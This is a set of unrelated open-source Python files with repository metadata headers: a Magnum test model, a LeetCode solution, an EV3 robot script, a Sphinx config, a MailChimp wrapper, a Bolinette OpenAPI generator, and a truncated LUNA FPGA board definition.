mail2nsrajesh/magnum
|
2e7e5a77967028c961337177ce577eb936c3845c
|
[
"Apache-2.0"
] | null | null | null |
magnum/tests/functional/api/v1/models/baypatch_model.py
|
mail2nsrajesh/magnum
|
2e7e5a77967028c961337177ce577eb936c3845c
|
[
"Apache-2.0"
] | null | null | null |
magnum/tests/functional/api/v1/models/baypatch_model.py
|
mail2nsrajesh/magnum
|
2e7e5a77967028c961337177ce577eb936c3845c
|
[
"Apache-2.0"
] | 1
|
2020-09-09T14:35:08.000Z
|
2020-09-09T14:35:08.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from magnum.tests.functional.common import models
class BayPatchData(models.BaseModel):
    """Data that encapsulates baypatch attributes"""
    # Attributes are populated dynamically by the BaseModel machinery.
    pass
class BayPatchEntity(models.EntityModel):
    """Entity Model that represents a single instance of BayPatchData"""
    # JSON key under which a single patch object is (de)serialized.
    ENTITY_NAME = 'baypatch'
    MODEL_TYPE = BayPatchData
class BayPatchCollection(models.CollectionModel):
    """Collection Model that represents a list of BayPatchData objects"""
    MODEL_TYPE = BayPatchData
    # Attribute name that holds the list of BayPatchData objects.
    COLLECTION_NAME = 'baypatchlist'

    def to_json(self):
        """Converts BayPatchCollection to json

        Retrieves list from COLLECTION_NAME attribute and converts each object
        to dict, appending it to a list. Then converts the entire list to json

        This is required due to COLLECTION_NAME holding a list of objects that
        needed to be converted to dict individually

        :returns: json object
        """
        data = getattr(self, BayPatchCollection.COLLECTION_NAME)
        collection = []
        for d in data:
            collection.append(d.to_dict())
        return json.dumps(collection)

    @classmethod
    def from_dict(cls, data):
        """Converts dict to BayPatchData

        Converts data dict to list of BayPatchData objects and stores it
        in COLLECTION_NAME

        Example of dict data:

            [{
                "path": "/name",
                "value": "myname",
                "op": "replace"
            }]

        :param data: dict of patch data
        :returns: json object
        """
        model = cls()
        collection = []
        for d in data:
            collection.append(cls.MODEL_TYPE.from_dict(d))
        setattr(model, cls.COLLECTION_NAME, collection)
        return model
| 30.090909
| 79
| 0.667242
|
4a0f14554b46d464f95e7a64d1a1063eea95e280
| 661
|
py
|
Python
|
Codes/gracekoo/interview_33.py
|
ghoslation/algorithm
|
5708bf89e59a80cd0f50f2e6138f069b4f9bc96e
|
[
"Apache-2.0"
] | 256
|
2017-10-25T13:02:15.000Z
|
2022-02-25T13:47:59.000Z
|
Codes/gracekoo/interview_33.py
|
IYoreI/Algorithm
|
0addf0cda0ec9e3f46c480eeda3a8ecb64c94121
|
[
"Apache-2.0"
] | 56
|
2017-10-27T01:34:20.000Z
|
2022-03-01T00:20:55.000Z
|
Codes/gracekoo/interview_33.py
|
IYoreI/Algorithm
|
0addf0cda0ec9e3f46c480eeda3a8ecb64c94121
|
[
"Apache-2.0"
] | 83
|
2017-10-25T12:51:53.000Z
|
2022-02-15T08:27:03.000Z
|
# -*- coding: utf-8 -*-
# @Time: 2020/7/3 10:21
# @Author: GraceKoo
# @File: interview_33.py
# @Desc: https://leetcode-cn.com/problems/chou-shu-lcof/
class Solution:
    def nthUglyNumber(self, n: int) -> int:
        """Return the n-th ugly number (positive integers whose only prime
        factors are 2, 3 and 5); 1 counts as the first. Returns 0 for n <= 0.

        Classic three-pointer DP: dp[k] holds the (k+1)-th ugly number, and
        i2/i3/i5 index the smallest ugly numbers not yet multiplied by 2, 3
        and 5 respectively.
        """
        if n <= 0:
            return 0
        dp = [1] * n
        i2 = i3 = i5 = 0
        for k in range(1, n):
            by2, by3, by5 = dp[i2] * 2, dp[i3] * 3, dp[i5] * 5
            dp[k] = min(by2, by3, by5)
            # Advance every pointer that produced the chosen value so
            # duplicates (e.g. 6 = 2*3 = 3*2) are emitted only once.
            if dp[k] == by2:
                i2 += 1
            if dp[k] == by3:
                i3 += 1
            if dp[k] == by5:
                i5 += 1
        return dp[-1]
so = Solution()
print(so.nthUglyNumber(10))
| 24.481481
| 59
| 0.444781
|
4a0f15d5405b6d9f46b85e848a3241dc407faf16
| 1,288
|
py
|
Python
|
tracker/01-tank-and-leds.py
|
obo/lego
|
7c24ed157610ced2461c460ddb5276dfb2adaa72
|
[
"MIT"
] | null | null | null |
tracker/01-tank-and-leds.py
|
obo/lego
|
7c24ed157610ced2461c460ddb5276dfb2adaa72
|
[
"MIT"
] | null | null | null |
tracker/01-tank-and-leds.py
|
obo/lego
|
7c24ed157610ced2461c460ddb5276dfb2adaa72
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import logging
from TRACK3R import TRACK3RWithClaw
import threading
import signal
import ev3dev.ev3 as ev3
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)5s: %(message)s')
log = logging.getLogger(__name__)
log.info("Starting TRACK3RWithClaw")
def touch_leds(done):
    """
    This is the second thread of execution. It will constantly poll the
    touch button and change leds: pressed -> RED, released -> GREEN.
    Loops until the main thread sets the `done` event.
    """
    ts = ev3.TouchSensor()
    while not done.is_set():
        # ts.value() is 0 or 1, used to index the (GREEN, RED) tuple.
        ev3.Leds.set_color(ev3.Leds.LEFT, (ev3.Leds.GREEN, ev3.Leds.RED)[ts.value()])
# The 'done' event will be used to signal the threads to stop:
done = threading.Event()
# We also need to catch SIGINT (keyboard interrup) and SIGTERM (termination
# signal from brickman) and exit gracefully:
def signal_handler(signal, frame):
    # SIGINT/SIGTERM handler: set the shared event so worker threads exit.
    # (The `signal` parameter shadows the module name — standard handler
    # signature, the module is not needed inside the handler.)
    done.set()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# Now that we have the worker functions defined, lets run those in separate
# threads.
head = threading.Thread(target=touch_leds, args=(done,))
head.start()
log.info("Started TRACK3RWithClaw")
ev3.Sound.speak("I'm ready!")
tracker = TRACK3RWithClaw()
tracker.main()
log.info("Exiting TRACK3RWithClaw")
done.set()
head.join()
| 25.254902
| 85
| 0.725932
|
4a0f16c7e008cde5441ab1c82f5d2550f089d555
| 8,195
|
py
|
Python
|
docs/conf.py
|
yliharma/django-maat
|
6aa0ee72bb21658513021506dfd0dde2ee9bd2f1
|
[
"MIT"
] | null | null | null |
docs/conf.py
|
yliharma/django-maat
|
6aa0ee72bb21658513021506dfd0dde2ee9bd2f1
|
[
"MIT"
] | null | null | null |
docs/conf.py
|
yliharma/django-maat
|
6aa0ee72bb21658513021506dfd0dde2ee9bd2f1
|
[
"MIT"
] | 1
|
2020-06-19T13:40:47.000Z
|
2020-06-19T13:40:47.000Z
|
# -*- coding: utf-8 -*-
#
# Django-maat documentation build configuration file, created by
# sphinx-quickstart on Wed Nov 5 11:53:38 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Django-maat'
copyright = u'2014, Germano Guerrini'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Django-maatdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'Django-maat.tex', u'Django-maat Documentation',
u'Germano Guerrini', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'django-maat', u'Django-maat Documentation',
[u'Germano Guerrini'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Django-maat', u'Django-maat Documentation',
u'Germano Guerrini', 'Django-maat', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| 31.640927
| 79
| 0.718121
|
4a0f16d9e14d6eb4716eab018414b76fe30b9723
| 1,221
|
py
|
Python
|
mailchimp3/entities/member.py
|
multiplay/python-mailchimp
|
b810821b9a792e820e21eabf124d467799f82a4e
|
[
"MIT"
] | null | null | null |
mailchimp3/entities/member.py
|
multiplay/python-mailchimp
|
b810821b9a792e820e21eabf124d467799f82a4e
|
[
"MIT"
] | null | null | null |
mailchimp3/entities/member.py
|
multiplay/python-mailchimp
|
b810821b9a792e820e21eabf124d467799f82a4e
|
[
"MIT"
] | 1
|
2022-02-12T11:32:46.000Z
|
2022-02-12T11:32:46.000Z
|
from mailchimp3.baseapi import BaseApi
class Member(BaseApi):
    """CRUD access to the members of a MailChimp list.

    All calls go through the ``lists`` endpoint, i.e.
    ``/lists/{list_id}/members[/{member_id}]``.
    """

    def __init__(self, *args, **kwargs):
        """Initialize the wrapper and point it at the ``lists`` endpoint."""
        super(Member, self).__init__(*args, **kwargs)
        self.endpoint = 'lists'

    def all(self, list_id):
        """
        returns the first 10 members for a specific list.
        """
        members_path = self._build_path(list_id, 'members')
        return self._mc_client._get(url=members_path)

    def get(self, list_id, member_id):
        """
        returns the specified list member.
        """
        member_path = self._build_path(list_id, 'members', member_id)
        return self._mc_client._get(url=member_path)

    def update(self, list_id, member_id, data):
        """
        updates an existing list member.
        """
        member_path = self._build_path(list_id, 'members', member_id)
        return self._mc_client._patch(url=member_path, data=data)

    def delete(self, list_id, member_id):
        """
        removes an existing list member from the list. This cannot be undone.
        """
        member_path = self._build_path(list_id, 'members', member_id)
        return self._mc_client._delete(url=member_path)

    def create(self, list_id, data):
        """
        adds a new member to the list.
        """
        members_path = self._build_path(list_id, 'members')
        return self._mc_client._post(url=members_path, data=data)
| 31.307692
| 101
| 0.622441
|
4a0f17f9ed80eae094f5c320634aeec09cd27be1
| 10,171
|
py
|
Python
|
bolinette/web/docs.py
|
TheCaptainCat/flasque
|
d42deb57572084f513202a32c460186700ce8e0b
|
[
"MIT"
] | 3
|
2019-10-25T12:21:28.000Z
|
2020-09-11T13:43:32.000Z
|
bolinette/web/docs.py
|
TheCaptainCat/bolinette
|
d42deb57572084f513202a32c460186700ce8e0b
|
[
"MIT"
] | null | null | null |
bolinette/web/docs.py
|
TheCaptainCat/bolinette
|
d42deb57572084f513202a32c460186700ce8e0b
|
[
"MIT"
] | null | null | null |
import re
from typing import Any, Literal
import yaml
from aiohttp import web as aio_web
from aiohttp_swagger import setup_swagger
from bolinette import types
from bolinette.core import abc, BolinetteContext
from bolinette.data import DataContext, WithDataContext, mapping
from bolinette.web import (
ext,
WebContext,
WithWebContext,
Controller,
ControllerRoute,
ControllerMetadata,
HttpMethod,
)
from bolinette.utils import paths, files
class Documentation(abc.WithContext, WithDataContext, WithWebContext):
    """Builds an OpenAPI 3.0 document describing the app's HTTP API.

    The document is assembled from controller route docstrings, the
    payload/response mapping definitions and the app manifest, then
    dumped as YAML to ``swagger.yaml`` in the instance folder.
    """

    def __init__(
        self, context: BolinetteContext, data_ctx: DataContext, web_ctx: WebContext
    ):
        abc.WithContext.__init__(self, context)
        WithDataContext.__init__(self, data_ctx)
        WithWebContext.__init__(self, web_ctx)
        # Destination of the generated OpenAPI document.
        self.swagger_path = self.context.instance_path("swagger.yaml")
        # Matches "{param}" placeholders in route paths.
        self._path_param_regex = re.compile(r"{([^}]*)}")
        # Matches docstring commands of the form
        # "-response <3-digit code> [<type>][: <description>]".
        self._response_regex = re.compile(
            r"^-response ([\d]{3})(?: ([^:]*))?(?:: ?(.*))?$"
        )
        # Matches a "file[<mime type>]" response type.
        self._response_type_regex = re.compile(r"file\[([^]]*)]")
        # Matches the "returns" response type (use the route's declared model).
        self._response_returns_regex = re.compile(r"returns")
        # Maps bolinette column types to OpenAPI schema fragments.
        self._type_map = {
            types.db.Integer: {"type": "integer"},
            types.db.Boolean: {"type": "boolean"},
            types.db.String: {"type": "string"},
            types.db.Email: {"type": "string", "format": "email"},
            types.db.Float: {"type": "number", "format": "float"},
            types.db.Date: {"type": "string", "format": "date-time"},
            types.db.Password: {"type": "string", "format": "password"},
        }

    def build(self):
        """Assemble the OpenAPI document and write it to ``swagger_path``."""
        self.context.logger.info("Building API documentation")
        content = {
            "openapi": "3.0.0",
            "info": {
                "title": self.context.manifest.get("name", "Bolinette App"),
                "description": self.context.manifest.get(
                    "desc", "My web app built with the Bolinette framework"
                ),
                "version": self.context.manifest.get("version", "0.0.1"),
            },
            "servers": [
                {"url": f'http://localhost:{self.context.env.get("port", 5000)}'}
            ],
            "paths": self._build_routes(),
            "components": {"schemas": self._build_schemas()},
        }
        files.write(self.swagger_path, yaml.safe_dump(content))

    def _build_routes(self):
        """Build the OpenAPI "paths" object from every registered route."""
        routes = {}
        for path, method, route in self.__web_ctx__.resources.routes:
            self._build_route(path, method, route, routes)
        return routes

    def _build_route(
        self,
        path: str,
        method: HttpMethod,
        route: ControllerRoute,
        routes: dict[str, Any],
    ):
        """Add one route (and, recursively, its chained inner routes) to *routes*."""
        if route.controller is not None:
            if not path:
                path = "/"
            if path not in routes:
                routes[path] = {}
            docs: dict[str, Any] = {
                "tags": [f"{route.controller.__blnt__.name} controller"]
            }
            parsed_docs = self._parse_docs(route.docstring, route)
            if len(parsed_docs) > 0:
                docs.update(parsed_docs)
            # When the docstring declared no responses, fall back to a
            # generic 200 built from the route's declared return model.
            if (
                "responses" not in docs or len(docs["responses"]) <= 0
            ) and route.returns:
                if "responses" not in docs:
                    docs["responses"] = {}
                ref = self._build_ref(route, "response")
                if len(ref) > 0:
                    docs["responses"][200] = {
                        "content": {"application/json": {"schema": ref}}
                    }
            parameters = self._parse_path(path)
            if len(parameters) > 0:
                docs["parameters"] = parameters
            routes[path][method.name.lower()] = docs
        if route.inner_route is not None:
            self._build_route(path, method, route.inner_route, routes)

    def _parse_docs(self, docstring: str | None, route: ControllerRoute):
        """Split a route docstring on blank lines and fold each part into
        an OpenAPI operation object (summary / commands / description)."""
        if not docstring:
            return {}
        docs: dict[str, Any] = {}
        parsed = [s.strip("\n ") for s in docstring.split("\n\n")]
        doc_index = 0
        for part in parsed:
            self._parse_doc_line(part, docs, doc_index, route)
            doc_index += 1
        return docs

    def _parse_doc_line(
        self, part: str, docs: dict[str, Any], index: int, route: ControllerRoute
    ):
        """Interpret one docstring part.

        The first part becomes the summary; parts starting with "-" are
        command lists (only "-response" is recognized here); everything
        else is appended to the description.
        """
        if index == 0:
            docs["summary"] = part
            return
        if part.startswith("-"):
            # Re-join wrapped continuation lines so each command is a
            # single string before matching.
            lines = [line.strip() for line in part.split("\n")]
            commands = []
            for line in lines:
                if line.startswith("-"):
                    commands.append(line)
                else:
                    commands[-1] += f" {line}"
            for command in commands:
                if command.startswith("-response"):
                    self._parse_responses(command, docs, route)
            return
        if "description" not in docs:
            docs["description"] = ""
        if len(docs["description"]) > 0:
            docs["description"] += "\n\n"
        docs["description"] += part

    def _parse_responses(self, text: str, docs: dict[str, Any], route: ControllerRoute):
        """Parse a "-response <code> [<type>][: <text>]" command into the
        operation's "responses" object."""
        if (match := self._response_regex.match(text)) is not None:
            code = match.group(1)
            res_type = match.group(2)
            text = match.group(3)
            if "responses" not in docs:
                docs["responses"] = {}
            response: dict[str, Any] = {}
            if text:
                response["description"] = text
            if res_type:
                if self._response_returns_regex.match(res_type) is not None:
                    # "returns": reference the route's declared return model.
                    ref = self._build_ref(route, "response")
                    if len(ref) > 0:
                        response["content"] = {"application/json": {"schema": ref}}
                elif (match := self._response_type_regex.match(res_type)) is not None:
                    # "file[<mime>]": a raw file download of the given mime type.
                    if mime := match.group(1):
                        response["content"] = {mime: {"schema": {"type": "string"}}}
            if len(response) > 0:
                docs["responses"][code] = response

    @staticmethod
    def _build_ref(route: ControllerRoute, schema_type: Literal["response", "payload"]):
        """Build a $ref (or array-of-$ref) to the route's declared return
        model schema; returns an empty dict when the route returns nothing.

        NOTE(review): only ever called with "response" in this file. The
        "payload" variant would not match the "payloads.*" keys produced
        by _build_schemas — confirm before using it.
        """
        returns = route.returns
        if returns:
            ref = {
                "$ref": f"#/components/schemas/{schema_type}.{returns.model}.{returns.key}"
            }
            if returns.as_list:
                return {"type": "array", "items": ref}
            return ref
        return {}

    def _parse_path(self, path: str):
        """Extract "{name[:args]}" placeholders from *path* as OpenAPI
        path parameters. Any ":"-suffixed args are split off but unused."""
        parameters = []
        for match in self._path_param_regex.finditer(path):
            param, *args = match.group(1).split(":")
            parameters.append({"name": param, "in": "path", "required": True})
        return parameters

    def _build_schemas(self):
        """Build the "components.schemas" object from the payload and
        response mapping definitions.

        Payload schemas include foreign keys but not nested definitions;
        response schemas include nested definitions but not foreign keys.
        """
        schemas = {}
        collections = {
            "payloads": self.__data_ctx__.mapper.payloads,
            "response": self.__data_ctx__.mapper.responses,
        }
        include_defs = {"payloads": False, "response": True}
        include_fks = {"payloads": True, "response": False}
        for def_type, collection in collections.items():
            inc_defs = include_defs[def_type]
            inc_fks = include_fks[def_type]
            for model, key, definition in collection:
                properties = {}
                for field in definition.fields:
                    if isinstance(field, mapping.Field):
                        properties[field.name] = self._type_map[field.type]
                    elif isinstance(field, mapping.Definition):
                        if inc_defs:
                            properties[field.name] = {
                                "$ref": f"#/components/schemas/{def_type}.{field.model_name}.{field.model_key}"
                            }
                        if inc_fks and isinstance(field, mapping.Reference):
                            # NOTE(review): "int" is not a valid OpenAPI type
                            # ("integer" is) — confirm and fix upstream.
                            properties[field.foreign_key] = {"type": "int"}
                    elif isinstance(field, mapping.List) and inc_defs:
                        elem = field.element
                        if isinstance(elem, mapping.Definition):
                            properties[field.name] = {
                                "type": "array",
                                "items": {
                                    "$ref": f"#/components/schemas/{def_type}.{elem.model_name}.{elem.model_key}"
                                },
                            }
                schema = {"type": "object", "properties": properties}
                schemas[f"{def_type}.{model}.{key}"] = schema
        return schemas

    def setup(self):
        """Serve the swagger UI at /api when swagger.yaml exists;
        otherwise register a fallback "no docs" route at the same path."""
        if paths.exists(self.swagger_path):
            setup_swagger(
                self.context.registry.get(aio_web.Application),
                swagger_url="/api",
                ui_version=3,
                swagger_from_file=self.swagger_path,
            )
        else:
            context = self.context
            web_ctx = self.context.registry.get(WebContext)
            no_docs_ctrl = NoDocsController(context, web_ctx)
            no_docs_route: ControllerRoute = no_docs_ctrl.get_no_docs.instantiate(
                controller=no_docs_ctrl, context=context, web_ctx=web_ctx
            )
            no_docs_route.setup()
class NoDocsController(Controller):
    """Fallback controller serving a placeholder page at /api when no
    swagger.yaml has been generated."""

    __blnt__ = ControllerMetadata("no_docs", "", False, "", "/api", [])

    def __init__(self, context: BolinetteContext, web_ctx: WebContext):
        super().__init__(context, web_ctx)

    @ext.route.get("")
    async def get_no_docs(self):
        """Render the "no docs" template with metadata from the manifest."""
        manifest = self.context.manifest
        defaults = {
            "name": "Bolinette App",
            "desc": "My web app built with the Bolinette framework",
            "version": "0.0.1",
        }
        params = {key: manifest.get(key, fallback) for key, fallback in defaults.items()}
        template_dir = self.context.internal_files_path("templates")
        return self.response.render_template("no_docs.html.jinja2", params, template_dir)
| 40.043307
| 113
| 0.530135
|
4a0f1938cb075880aadfd70a2bed774ec09b3550
| 8,650
|
py
|
Python
|
luna/gateware/platform/daisho.py
|
pimdegroot/luna
|
16110a59c72279e7272310e81ca4656da11fb1da
|
[
"BSD-3-Clause"
] | null | null | null |
luna/gateware/platform/daisho.py
|
pimdegroot/luna
|
16110a59c72279e7272310e81ca4656da11fb1da
|
[
"BSD-3-Clause"
] | null | null | null |
luna/gateware/platform/daisho.py
|
pimdegroot/luna
|
16110a59c72279e7272310e81ca4656da11fb1da
|
[
"BSD-3-Clause"
] | null | null | null |
#
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>
# SPDX-License-Identifier: BSD-3-Clause
from nmigen.build import Resource, Subsignal, Pins, PinsN, Attrs, Clock, DiffPairs, Connector
from nmigen.vendor.intel import IntelPlatform
__all__ = ["DaishoPlatform"]
def ULPIResource(name, data_sites, clk_site, dir_site, nxt_site, stp_site, reset_site):
    """ Generates a set of resources for a ULPI-connected USB PHY. """
    # Build the subsignal list first, then hand everything to Resource
    # in the same positional order as before.
    subsignals = [
        Subsignal("data", Pins(data_sites, dir="io")),
        Subsignal("clk", Pins(clk_site, dir="o")),
        Subsignal("dir", Pins(dir_site, dir="i")),
        Subsignal("nxt", Pins(nxt_site, dir="i")),
        Subsignal("stp", Pins(stp_site, dir="o")),
        Subsignal("rst", PinsN(reset_site, dir="o")),
    ]
    return Resource(name, 0, *subsignals, Attrs(IO_TYPE="LVCMOS33", SLEWRATE="FAST"))
class DaishoPlatform(IntelPlatform):
    """ Board description for Daisho boards.

    NOTE(review): several parts of this class target Lattice ECP5 tooling
    (ecppack options, ECP5 JTAG programmer, an LVCMOS18D note mentioning
    trellis/nextpnr) even though the class derives from IntelPlatform —
    this looks copied from LUNA's ECP5-based platform files; confirm
    which settings actually apply to this board.
    """

    name = "Daisho"
    # NOTE(review): "EEP4CE30F29C8" carries a doubled leading "E" compared
    # to the usual Cyclone IV "EP4CE30..." ordering codes — confirm.
    device = "EEP4CE30F29C8"
    default_clk = "clk_60MHz"
    #
    # Default clock frequencies for each of our clock domains.
    #
    # Different revisions have different FPGA speed grades, and thus the
    # default frequencies will vary.
    #
    DEFAULT_CLOCK_FREQUENCIES_MHZ = {
        "fast": 120,
        "sync": 60,
        "ulpi": 60
    }
    #
    # Preferred DRAM bus I/O (de)-skewing constants.
    #
    ram_timings = dict(
        clock_skew = 64
    )
    # Provides any platform-specific ULPI registers necessary.
    # This is the spot to put any platform-specific vendor registers that need
    # to be written.
    ulpi_extra_registers = {
        0x39: 0b000110 # USB3343: swap D+ and D- to match the LUNA boards
    }
    #
    # I/O resources.
    #
    resources = [
        # Primary, discrete 60MHz oscillator.
        Resource("clk_60MHz", 0, Pins("A8", dir="i"),
            Clock(60e6), Attrs(IO_TYPE="LVCMOS33")),
        # Connection to our SPI flash; can be used to work with the flash
        # from e.g. a bootloader.
        Resource("spi_flash", 0,
            # SCK is on pin 9; but doesn't have a traditional I/O buffer.
            # Instead, we'll need to drive a clock into a USRMCLK instance.
            # See interfaces/flash.py for more information.
            Subsignal("sdi", Pins("T8", dir="o")),
            Subsignal("sdo", Pins("T7", dir="i")),
            # In r0.1, the chip select line can either be driven by the FPGA
            # or by the Debug Controller. Accordingly, we'll mark the line as
            # bidirectional, and let the user decide.
            Subsignal("cs", PinsN("N8", dir="io")),
            Attrs(IO_TYPE="LVCMOS33")
        ),
        #
        # Note: r0.1 has a DFM issue that makes it difficult to solder a BGA with
        # reliable connections on the intended SCK pin (P12), and lacks a CS pin on the
        # debug SPI; which seems like a silly omission.
        #
        # Accordingly, we're mapping the debug SPI and UART over the same pins, as the
        # microcontroller can use either.
        #
        # UART connected to the debug controller; can be routed to a host via CDC-ACM.
        Resource("uart", 0,
            Subsignal("rx", Pins("R14", dir="i")),
            Subsignal("tx", Pins("T14", dir="o")),
            Attrs(IO_TYPE="LVCMOS33")
        ),
        # SPI bus connected to the debug controller, for simple register exchanges.
        # Note that the Debug Controller is the master on this bus.
        Resource("debug_spi", 0,
            Subsignal("sck", Pins( "R14", dir="i")),
            Subsignal("sdi", Pins( "P13", dir="i")),
            Subsignal("sdo", Pins( "P11", dir="o")),
            Subsignal("cs", PinsN("T14", dir="i")),
            Attrs(IO_TYPE="LVCMOS33")
        ),
        # FPGA-connected LEDs.
        Resource("led", 5, PinsN("P15", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
        Resource("led", 4, PinsN("N16", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
        Resource("led", 3, PinsN("M15", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
        Resource("led", 2, PinsN("M16", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
        Resource("led", 1, PinsN("L15", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
        Resource("led", 0, PinsN("L16", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
        # USB PHYs
        ULPIResource("sideband_phy",
            data_sites="R2 R1 P2 P1 N1 M2 M1 L2", clk_site="R4",
            dir_site="T3", nxt_site="T2", stp_site="T4", reset_site="R3"),
        ULPIResource("host_phy",
            data_sites="G2 G1 F2 F1 E1 D1 C1 B1", clk_site="K2",
            dir_site="J1", nxt_site="H2", stp_site="J2", reset_site="K1"),
        ULPIResource("target_phy",
            data_sites="D16 E15 E16 F15 F16 G15 J16 K16", clk_site="B15",
            dir_site="C15", nxt_site="C16", stp_site="B16", reset_site="G16"),
        # Target port power switching
        # Note: the r0.1 boards that have been produced incorrectly use the AP22814B
        # instead of the AP22814A. This inverts the load-switch enables.
        #
        Resource("power_a_port", 0, PinsN("C14", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
        Resource("pass_through_vbus", 0, PinsN("D14", dir="o"), Attrs(IO_TYPE="LVCMOS33")),
        Resource("target_vbus_fault", 0, Pins("K15", dir="i"), Attrs(IO_TYPE="LVCMOS33")),
        # HyperRAM (1V8 domain).
        Resource("ram", 0,
            # Note: our clock uses the pseudo-differential I/O present on the top tiles.
            # This requires a recent version of trellis+nextpnr. If your build complains
